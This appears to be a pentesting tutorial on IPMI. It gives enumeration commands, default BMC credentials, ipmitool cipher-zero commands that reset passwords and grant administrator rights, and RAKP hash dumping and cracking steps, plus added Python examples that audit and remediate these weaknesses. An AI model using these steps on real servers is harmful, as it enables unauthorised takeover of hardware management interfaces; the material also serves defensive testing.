PRIMARY CATEGORY → PROTOCOLS AND SERVICES
REFERENCES
Pentesting Guide to IPMI

IPMI → Intelligent Platform Management Interface

Protocols
RMCP+

Remote Management Control Protocol

It is used as a basis for communication in IPMI 2.0

It defines how IPMI messages are transmitted between a remote client and the BMC, facilitating hardware management and monitoring

RAKP

Remote Access Key Protocol

This protocol is used for authentication in IPMI 2.0

It authenticates users trying to access the BMC and establishes a secure connection

Ports

UDP

  • 623

This port is used for IPMI-based remote management via RMCP and RMCP+

The client sends messages to the BMC over RMCP/RMCP+ in order to manage or monitor the hardware


Enumeration

Extract IPMI Version
Nmap
nmap -p623 -sU --script ipmi-version -T5 -n -Pn --disable-arp-ping <TARGET>
Metasploit

Metasploit Module → auxiliary/scanner/ipmi/ipmi_version

msfconsole
> use auxiliary/scanner/ipmi/ipmi_version
> set RHOSTS <TARGET>
> run
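What the nmap script and the Metasploit module above actually send is a single unauthenticated "Get Channel Authentication Capabilities" request (NetFn App, command 0x38) wrapped in RMCP and an IPMI 1.5 session header with session id 0; the reply carries the version and authentication bits that the scanners report. The following is an added example (not code from the page, nmap or Metasploit) that builds that request, decodes a reply, and turns the capability bits into the findings a defender inventorying exposed BMCs would want. The reply it decodes is constructed inline, not captured from any device; `probe()` is the only function that touches the network.

```python
import socket

IPMI_PORT = 623  # RMCP/RMCP+ over UDP, as listed above


def ipmi_checksum(data: bytes) -> int:
    """IPMI 2's-complement checksum: the byte that makes the field sum to zero mod 256."""
    return (-sum(data)) & 0xFF


def build_get_auth_caps_request() -> bytes:
    """RMCP + IPMI 1.5 session wrapper around App/Get Channel Authentication Capabilities.

    Auth type NONE, session id 0, channel 0x0E ("this channel") with bit 7 set to
    request IPMI 2.0 extended data, privilege level ADMINISTRATOR (4).
    """
    rmcp = bytes([0x06, 0x00, 0xFF, 0x07])          # version 6, reserved, seq 0xFF, class IPMI
    session = bytes([0x00]) + bytes(4) + bytes(4)   # auth NONE, session seq 0, session id 0
    hdr = bytes([0x20, 0x06 << 2])                  # rsAddr = BMC (0x20), NetFn App (0x06) / LUN 0
    hdr += bytes([ipmi_checksum(hdr)])
    body = bytes([0x81, 0x00, 0x38, 0x8E, 0x04])    # rqAddr, rqSeq/LUN, cmd 0x38, channel 0xE|0x80, priv 4
    body += bytes([ipmi_checksum(body)])
    msg = hdr + body
    return rmcp + session + bytes([len(msg)]) + msg


def parse_auth_caps_response(pkt: bytes) -> dict:
    """Decode the reply; raises ValueError on anything that is not a well-formed reply."""
    if len(pkt) < 15 or pkt[0] != 0x06 or pkt[3] != 0x07:
        raise ValueError("not an RMCP/IPMI packet")
    msg = pkt[14:14 + pkt[13]]
    if len(msg) != pkt[13] or len(msg) < 16:
        raise ValueError("truncated IPMI message")
    if sum(msg[:3]) & 0xFF or sum(msg[3:]) & 0xFF:  # header and body checksums must zero their fields
        raise ValueError("bad IPMI checksum")
    if msg[5] != 0x38:
        raise ValueError("not a Get Channel Auth Capabilities reply")
    if msg[6] != 0x00:
        raise ValueError(f"completion code 0x{msg[6]:02x}")
    auth, status, ext = msg[8], msg[9], msg[10]
    v2 = bool(auth & 0x80)                          # bit 7: IPMI 2.0 extended data present
    return {
        "channel": msg[7] & 0x0F,
        "ipmi_2_0": v2 and bool(ext & 0x02),
        "ipmi_1_5": bool(ext & 0x01) if v2 else True,
        "auth_none": bool(auth & 0x01),
        "auth_md2": bool(auth & 0x02),
        "auth_md5": bool(auth & 0x04),
        "auth_password": bool(auth & 0x10),
        "auth_oem": bool(auth & 0x20),
        "anonymous_login": bool(status & 0x01),
        "null_user_enabled": bool(status & 0x02),
        "non_null_users": bool(status & 0x04),
        "user_level_auth_disabled": bool(status & 0x08),
        "per_message_auth_disabled": bool(status & 0x10),
        "kg_non_default": bool(status & 0x20),
    }


def findings(caps: dict) -> list:
    """Defender-oriented flags derived from the capability bits."""
    out = []
    if caps["auth_none"]:
        out.append("IPMI 1.5 auth type NONE accepted")
    if caps["anonymous_login"]:
        out.append("anonymous login (null user, null password) enabled")
    if caps["null_user_enabled"]:
        out.append("null usernames enabled")
    if caps["ipmi_2_0"]:
        out.append("IPMI 2.0/RAKP available: password HMACs are returned to unauthenticated clients")
    return out


def probe(host: str, timeout: float = 2.0) -> dict:
    """Send the request over UDP/623 and decode the reply (needs network access)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_get_auth_caps_request(), (host, IPMI_PORT))
        data, _ = s.recvfrom(512)
    return parse_auth_caps_response(data)


def sample_reply() -> bytes:
    """Constructed reply (not captured from a device): IPMI 1.5 + 2.0, MD5 and
    straight-password auth, null usernames enabled, anonymous login off, channel 1."""
    hdr = bytes([0x81, 0x07 << 2])
    hdr += bytes([ipmi_checksum(hdr)])
    body = bytes([0x20, 0x00, 0x38, 0x00, 0x01, 0x80 | 0x10 | 0x04, 0x04 | 0x02, 0x03]) + bytes(4)
    body += bytes([ipmi_checksum(body)])
    msg = hdr + body
    return bytes([0x06, 0x00, 0xFF, 0x07, 0x00]) + bytes(8) + bytes([len(msg)]) + msg


if __name__ == "__main__":
    for f in findings(parse_auth_caps_response(sample_reply())):
        print("-", f)
```

Because the request carries no session, nothing in the BMC's logs distinguishes this probe from a normal session setup; the practical control is to keep UDP/623 off routable networks and to watch for it at the perimeter.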

Default Credentials

Product            Username        Password
HP iLO             Administrator   Randomized 8 Chars String
DELL iDRAC         root            calvin
IBM IMM            USERID          PASSW0RD
Fujitsu iRMC       admin           admin
Supermicro IPMI    ADMIN           ADMIN
Oracle ILOM        root            changeme
ASUS iKVM BMC      admin           admin

IPMI Auth Bypass Via Cipher 0

Enumeration
Nmap
nmap -p623 -sU --script ipmi-cipher-zero -T5 -n -Pn --disable-arp-ping <TARGET>
Metasploit
msfconsole
> use auxiliary/scanner/ipmi/ipmi_cipher_zero 
> set RHOSTS <TARGET>
> run
Exploitation
IPMITool
  • List all Existing Users in the Remote System
ipmitool -I lanplus -C 0 -H <TARGET> -U <USERNAME> -P <PASSWORD> user list

-C 0 → use cipher suite 0 (no cipher applied)

  • Change a User Name with a Specific ID
ipmitool -I lanplus -C 0 -H <TARGET> -U <USERNAME> -P <PASSWORD> user set name <USER_ID> <USERNAME>
  • Change a User’s Password with a Specific ID
ipmitool -I lanplus -C 0 -H <TARGET> -U <USERNAME> -P <PASSWORD> user set password <USER_ID> <PASSWORD>
  • Grant Administrator Privileges to the User with a Specific ID
ipmitool -I lanplus -C 0 -H <TARGET> -U <USERNAME> -P <PASSWORD> user priv <USER_ID> 4

4 → Administrator Privilege Level

Level   Privilege
1       No Access
2       User
3       Operator
4       Administrator
  • Enable a User with a Specific ID
ipmitool -I lanplus -C 0 -H <TARGET> -U <USERNAME> -P <PASSWORD> user enable <USER_ID>
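The scanners above test cipher suite 0 from the outside; from the inside, the same condition is visible in `ipmitool lan print <channel>`, where the `RMCP+ Cipher Suites` line lists the enabled suites and `Cipher Suite Priv Max` gives, one character per suite id starting at suite 0, the highest privilege each suite may be used with (X = unused). The following is an added example (not from the page or the ipmitool project) that parses a constructed excerpt of that output, reports whether suite 0 is enabled and at what privilege, and builds the `ipmitool lan set <channel> cipher_privs <privlist>` command that marks suite 0 unused while leaving the other suites as configured. The sample output and the channel number are constructed.

```python
# Constructed excerpt of "ipmitool lan print 1" output; not captured from a real BMC.
SAMPLE_LAN_PRINT = """\
Set in Progress         : Set Complete
Auth Type Support       : NONE MD2 MD5 PASSWORD
Auth Type Enable        : Callback : MD2 MD5 PASSWORD
                        : User     : MD2 MD5 PASSWORD
                        : Operator : MD2 MD5 PASSWORD
                        : Admin    : MD2 MD5 PASSWORD
                        : OEM      : MD2 MD5 PASSWORD
IP Address Source       : Static Address
IP Address              : 192.0.2.10
RMCP+ Cipher Suites     : 0,1,2,3,6,7,8,11,12
Cipher Suite Priv Max   : aaaaXXaaaXXaaXX
                        :     X=Cipher Suite Unused
                        :     c=CALLBACK
                        :     u=USER
                        :     o=OPERATOR
                        :     a=ADMIN
                        :     O=OEM
"""

PRIV_NAMES = {"X": "unused", "c": "CALLBACK", "u": "USER", "o": "OPERATOR", "a": "ADMIN", "O": "OEM"}


def parse_lan_print(text: str) -> dict:
    """Keep top-level 'Key : value' lines; indented ': ...' continuation lines are skipped."""
    info = {}
    for line in text.splitlines():
        if not line or line[0].isspace() or ":" not in line:
            continue
        key, value = line.split(":", 1)
        info[key.strip()] = value.strip()
    return info


def cipher_suite_privs(info: dict) -> dict:
    """Map each enabled suite id to its max-privilege letter (position = suite id)."""
    suites = [int(s) for s in info.get("RMCP+ Cipher Suites", "").split(",") if s.strip().isdigit()]
    privs = info.get("Cipher Suite Priv Max", "")
    return {s: (privs[s] if s < len(privs) else "?") for s in suites}


def cipher_zero_finding(info: dict):
    """None when suite 0 is absent or marked unused, otherwise a one-line finding."""
    privs = cipher_suite_privs(info)
    if 0 not in privs or privs[0] == "X":
        return None
    return (f"cipher suite 0 enabled up to {PRIV_NAMES.get(privs[0], privs[0])}: "
            "RMCP+ sessions with no authentication, integrity or confidentiality are accepted")


def hardened_priv_string(privs: str) -> str:
    """Mark position 0 (suite 0) unused; every other suite keeps its configured privilege."""
    return "X" + privs[1:] if privs else privs


def remediation_command(channel: int, info: dict) -> str:
    """ipmitool 'lan set <channel> cipher_privs <privlist>' with suite 0 disabled."""
    return f"ipmitool lan set {channel} cipher_privs {hardened_priv_string(info['Cipher Suite Priv Max'])}"


if __name__ == "__main__":
    info = parse_lan_print(SAMPLE_LAN_PRINT)
    finding = cipher_zero_finding(info)
    if finding:
        print(finding)
        print("remediation:", remediation_command(1, info))
```

After applying the change, re-run `ipmitool lan print <channel>` and re-parse: the finding should come back as `None`. Some BMC firmware only honours cipher-suite changes made through the vendor's web interface, so verify with the external check rather than trusting the set command alone.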

IPMI 2.0 RAKP Auth Remote Password Hash Retrieval

Extracting Hashes
Metasploit
msfconsole
> use auxiliary/scanner/ipmi/ipmi_dumphashes
> set RHOSTS <TARGET>
> set OUTPUT_JOHN_FILE <OUTPUT_FILE>
> set OUTPUT_HASHCAT_FILE <OUTPUT_FILE>
> run
Cracking Hashes
Hashcat
hashcat --hash-type 7300 --attack-mode 0 --force -O --outfile <FILE> <HASH_FILE> <DICTIONARY>
John
john <HASH_FILE> --wordlist <WORDLIST> --format=rakp
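What makes the hashes above obtainable is the protocol itself: in RAKP message 2 the BMC returns HMAC-SHA1, keyed with the user's password, over the two session ids, the two random numbers, the BMC GUID, the requested role and the username, before it has verified anything about the client. Mode 7300 in hashcat (and `--format=rakp` in John) simply recompute that HMAC for each candidate. The following is an added example (not from the page, hashcat, John or Metasploit) that assembles the salt in the spec's order, produces the `<salt_hex>:<hmac_hex>` line that mode 7300 consumes, and performs one candidate check, so the reader can see that the only thing standing between a dumped hash and the BMC password is the password's strength. All session ids, random numbers, the GUID and the role byte are constructed values; the username and password are the DELL iDRAC defaults from the table above.

```python
import hmac
import hashlib


def rakp_salt(sid_m: bytes, sid_c: bytes, rand_m: bytes, rand_c: bytes,
              guid_c: bytes, role: int, username: str) -> bytes:
    """Data the BMC authenticates in RAKP message 2 (IPMI 2.0 spec):
    SID_M || SID_C || R_M || R_C || GUID_C || Role_M || ULength_M || UName_M
    (M = remote console, C = managed system / BMC)."""
    if not (len(sid_m) == 4 and len(sid_c) == 4 and len(rand_m) == 16
            and len(rand_c) == 16 and len(guid_c) == 16):
        raise ValueError("session ids are 4 bytes; randoms and GUID are 16 bytes")
    uname = username.encode()
    return sid_m + sid_c + rand_m + rand_c + guid_c + bytes([role, len(uname)]) + uname


def rakp2_auth_code(password: str, salt: bytes) -> bytes:
    """Key Exchange Authentication Code: HMAC-SHA1 keyed with the user password (K_UID).
    HMAC zero-pads short keys, so the raw password and the spec's 20-byte padded key agree."""
    return hmac.new(password.encode(), salt, hashlib.sha1).digest()


def hashcat_7300_line(salt: bytes, auth_code: bytes) -> str:
    """The <salt_hex>:<hmac_hex> form that hashcat mode 7300 expects."""
    return f"{salt.hex()}:{auth_code.hex()}"


def check_candidate(line: str, candidate: str) -> bool:
    """One cracker step: recompute the HMAC for a candidate password and compare."""
    salt_hex, mac_hex = line.split(":")
    return hmac.compare_digest(rakp2_auth_code(candidate, bytes.fromhex(salt_hex)),
                               bytes.fromhex(mac_hex))


def demo_line() -> str:
    """Constructed exchange: fixed ids/randoms/GUID, role 0x14 (ADMIN, name-only lookup
    bit set), username 'root', password 'calvin'. Nothing here comes from a real BMC."""
    salt = rakp_salt(b"\xa1\xa2\xa3\xa4", b"\x01\x02\x03\x04",
                     bytes(range(16)), bytes(range(16, 32)), bytes(16), 0x14, "root")
    return hashcat_7300_line(salt, rakp2_auth_code("calvin", salt))


if __name__ == "__main__":
    line = demo_line()
    print(line)
    for guess in ("calvin", "Calvin", "changeme"):
        print(f"{guess!r}: {check_candidate(line, guess)}")
```

Because the verifier is a single HMAC-SHA1 per guess, default and dictionary passwords fall in seconds once a hash is dumped; long, unique BMC passwords and keeping UDP/623 off reachable networks are the controls, and a dumped-hash event should be treated as a credential exposure for that account.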